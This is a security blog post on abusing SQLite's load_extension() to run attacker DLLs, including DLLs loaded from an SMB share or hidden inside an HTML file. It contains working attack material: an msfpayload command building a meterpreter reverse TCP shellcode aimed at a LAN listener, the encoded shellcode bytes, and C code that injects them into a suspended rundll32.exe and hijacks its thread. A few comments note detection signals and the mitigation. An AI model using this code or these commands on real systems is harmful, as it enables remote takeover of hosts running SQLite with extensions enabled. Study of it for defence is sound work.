Fun with SQLite Load_Extension

What is load_extension?

This interface loads an SQLite extension library from the named file.

[code language="C"]
int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);
[/code]

More information: https://www.sqlite.org/c3ref/load_extension.html
You can use this function to load a SQLite extension. However, sqlite3_enable_load_extension() is turned off by default to prevent this from being used in SQL injection attacks. You can read more here: https://www.sqlite.org/c3ref/enable_load_extension.html
The syntax would be
[code language="sql"]
select load_extension(‘path\dll’, ‘EP’);
[/code]
However, this path (const char *zFile) can also point to an SMB share.

Custom DLLs

We can of course code our own malicious DLLs and execute our own malicious code.
[code language="C"]
#include <windows.h>
/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
/*
 * Loader entry point of the demo DLL: pops a message box on each loader
 * notification and reports success to the loader.
 *
 * hinstDLL and lpvReserved are unused; fdwReason selects the message.
 * Always returns TRUE.
 */
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;

    /* the three "tear-down"/thread notifications share one message; any
     * other reason value is ignored */
    const BOOL shared_message = fdwReason == DLL_THREAD_ATTACH
                             || fdwReason == DLL_THREAD_DETACH
                             || fdwReason == DLL_PROCESS_DETACH;

    if (fdwReason == DLL_PROCESS_ATTACH) {
        MessageBox(0, "You got pwned", "@OsandaMalith", MB_OK | MB_ICONERROR);
    } else if (shared_message) {
        MessageBox(0, "Unloading DLL", "@OsandaMalith", MB_OK | MB_ICONWARNING);
    }
    return TRUE;
}

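/*
 * Routine named by the zProc argument of the load_extension() call, so it is
 * what sqlite3_load_extension() invokes once the DLL is mapped. Shows a
 * message box and returns 0.
 *
 * Returns 0 unconditionally. The original fell off the end without a return
 * statement, which is undefined behaviour as soon as the caller reads the
 * result (presumably as a status code — confirm against the SQLite loader).
 */
int hello(void) {
    MessageBox(0, "Just Kidding :)", "@OsandaMalith", MB_OK | MB_ICONINFORMATION);
    return 0;
}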
[/code]
We can also use MASM32 to code the DLL, which will be extremely small in size.

.386
; Author: @OsandaMalith
; Website: https://osandamalith.com
; Demo DLL: every loader notification pops a message box; hello is the
; routine named as the entry point (zProc) in the load_extension() call.
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
Include user32.inc
Include kernel32.inc
IncludeLib user32.lib
IncludeLib kernel32.lib
.DATA
; NUL-terminated strings used as the message-box title (AppName) and bodies
AppName db "DLL Skeleton",0
HelloMsg db "Just Kidding :)",0
LoadMsg db "You got Pwned!",0
UnloadMsg db "The DLL is unloaded",0
ThreadCreated db "A thread is created in this process",0
ThreadDestroyed db "A thread is destroyed in this process",0
.code
; DllEntry: reason is one of the loader notifications; the .else arm covers
; the remaining case (DLL_THREAD_DETACH). Returns TRUE in eax.
DllEntry proc hInstance:HINSTANCE, reason:DWORD, reserved1:DWORD
.if reason==DLL_PROCESS_ATTACH
invoke MessageBox,NULL,addr LoadMsg,addr AppName,MB_OK + MB_ICONERROR + MB_RTLREADING
.elseif reason==DLL_PROCESS_DETACH
invoke MessageBox,NULL,addr UnloadMsg,addr AppName,MB_OK + MB_ICONWARNING
.elseif reason==DLL_THREAD_ATTACH
invoke MessageBox,NULL,addr ThreadCreated,addr AppName,MB_OK
.else
invoke MessageBox,NULL,addr ThreadDestroyed,addr AppName,MB_OK
.endif
mov eax,TRUE
ret
DllEntry Endp
; hello: shows HelloMsg. eax is not set explicitly, so on return it still
; holds whatever MessageBox returned.
hello proc
invoke MessageBox,NULL,addr HelloMsg,addr AppName,MB_OK + MB_ICONINFORMATION + MB_RTLREADING
ret
hello endp
End DllEntry


HTML + DLL

You can check out the drop_and_run project by hasherezade https://github.com/hasherezade/snippets/tree/master/drop_and_run
demo.html is a file that has our DLL embedded within HTML comments.
So we can embed our malicious DLL code inside an HTML file 🙂
[code language="sql"]
select load_extension(‘\\192.168.0.100\WinAsm\dll\cdll.html’,’hello’);
[/code]


Shellcode + GameOver

We can use shellcode and compile our own DLL. For this example I’m using a meterpreter reverse tcp shellcode.
[code]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -b ‘\x00\x0A\x0D’ -t c
[/code]

[code language="C"]
#include <windows.h>
/*
* Website: https://osandamalith.com
*/
#define SCSIZE 2048
/*
 * Payload bytes emitted by the msfencode pipeline shown above, stored as a
 * string literal. The literal is much shorter than SCSIZE, so C's aggregate
 * initialization zero-fills the rest of the array; boom() below copies the
 * whole SCSIZE-byte array into the target, trailing zeros included.
 * The byte values themselves are opaque encoder output.
 */
unsigned char code[SCSIZE] =
"\xb8\xdc\x16\x51\xba\xdb\xd0\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x83\xc5\x04\x31\x45\x10\x03\x45\x10\x3e\xe3\xad\x52\x37"
"\x0c\x4e\xa3\x27\x84\xab\x92\x75\xf2\xb8\x87\x49\x70\xec\x2b"
"\x22\xd4\x05\xbf\x46\xf1\x2a\x08\xec\x27\x04\x89\xc1\xe7\xca"
"\x49\x40\x94\x10\x9e\xa2\xa5\xda\xd3\xa3\xe2\x07\x1b\xf1\xbb"
"\x4c\x8e\xe5\xc8\x11\x13\x04\x1f\x1e\x2b\x7e\x1a\xe1\xd8\x34"
"\x25\x32\x70\x43\x6d\xaa\xfa\x0b\x4e\xcb\x2f\x48\xb2\x82\x44"
"\xba\x40\x15\x8d\xf3\xa9\x27\xf1\x5f\x94\x87\xfc\x9e\xd0\x20"
"\x1f\xd5\x2a\x53\xa2\xed\xe8\x29\x78\x78\xed\x8a\x0b\xda\xd5"
"\x2b\xdf\xbc\x9e\x20\x94\xcb\xf9\x24\x2b\x18\x72\x50\xa0\x9f"
"\x55\xd0\xf2\xbb\x71\xb8\xa1\xa2\x20\x64\x07\xdb\x33\xc0\xf8"
"\x79\x3f\xe3\xed\xfb\x62\x6c\xc1\x31\x9d\x6c\x4d\x42\xee\x5e"
"\xd2\xf8\x78\xd3\x9b\x26\x7e\x14\xb6\x9e\x10\xeb\x39\xde\x39"
"\x28\x6d\x8e\x51\x99\x0e\x45\xa2\x26\xdb\xc9\xf2\x88\xb4\xa9"
"\xa2\x68\x65\x41\xa9\x66\x5a\x71\xd2\xac\xf3\x1b\x28\x27\x3c"
"\x73\x32\xd1\xd4\x81\x33\x0c\x79\x0c\xd5\x44\x91\x58\x4d\xf1"
"\x08\xc1\x05\x60\xd4\xdc\x63\xa2\x5e\xd2\x94\x6d\x97\x9f\x86"
"\x1a\x57\xea\xf5\x8d\x68\xc1\x90\x31\xfd\xed\x32\x65\x69\xef"
"\x63\x41\x36\x10\x46\xd9\xff\x84\x29\xb6\xff\x48\xaa\x46\x56"
"\x02\xaa\x2e\x0e\x76\xf9\x4b\x51\xa3\x6d\xc0\xc4\x4b\xc4\xb4"
"\x4f\x23\xea\xe3\xb8\xec\x15\xc6\x38\xd1\xc3\x2f\xbf\x23\x66"
"\x5c\x03";

/*
 * Overwrite l bytes starting at p with zero, one byte at a time.
 * Stands in for memset/ZeroMemory — presumably to avoid the CRT import;
 * TODO confirm that intent. NOTE(review): an optimizing compiler may
 * recognise the loop and emit a memset call anyway.
 *
 * p: start of the region; l: number of bytes (0 is a no-op).
 */
void inline_bzero(void *p, size_t l)
{
    unsigned char *dst = p;
    unsigned char *const end = dst + l;

    while (dst != end) {
        *dst++ = 0;
    }
}

void boom(void);

/*
 * Loader entry point: on DLL_PROCESS_ATTACH hands off to boom(); every
 * other notification is a no-op. Always returns TRUE — but note boom()
 * ends the calling thread (ExitThread), so on attach control never
 * reaches the return. DllMain runs while the loader lock is held.
 *
 * Mitigation on the host side: with sqlite3_enable_load_extension() left
 * off (the page's own note), SQL never reaches load_extension() and this
 * entry point is never mapped.
 */
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    (void)hDll;
    (void)lpReserved;

    if (dwReason == DLL_PROCESS_ATTACH) {
        boom();
    }
    return TRUE;
}

/*
 * Called from DLL_PROCESS_ATTACH: starts rundll32.exe suspended, writes the
 * `code` array into a fresh executable region in that process, points the
 * suspended primary thread's instruction pointer at it, resumes it, and
 * finally terminates the calling thread.
 *
 * Defender's view: CreateProcess(CREATE_SUSPENDED) -> VirtualAllocEx(RWX)
 * -> WriteProcessMemory -> SetThreadContext -> ResumeThread is a well-known
 * remote-injection chain. The RWX allocation in another process and the
 * thread-context change to a non-image address are the high-signal events
 * in EDR/Sysmon telemetry, and the parent/child relation
 * (sqlite-hosting process -> rundll32.exe) is the hunting pivot.
 * Mitigation on the host: keep sqlite3_enable_load_extension() off so SQL
 * cannot reach load_extension() at all.
 */
void boom(void) {
int error; /* unused */
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot; /* unused */
LPVOID ep;

/* zero STARTUPINFO, then set cb as CreateProcess requires */
inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);

/* child is created suspended so its primary thread can be redirected before it runs */
if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
/* request the control registers so the instruction pointer can be rewritten below */
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);

/* SCSIZE-byte region in the child, executable and writable at once */
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

/* &code and code are the same address for an array; all SCSIZE bytes are copied, trailing zeros included */
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);

/* instruction-pointer field depends on the build's architecture */
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif

SetThreadContext(pi.hThread,&ctx);

ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
/* ends the thread that is inside load_extension()/DllMain — reached whether or
 * not CreateProcess succeeded, so the host never gets control back here */
ExitThread(0);
}

[/code]


Mentions:
https://rinige.com/index.php/archives/538/

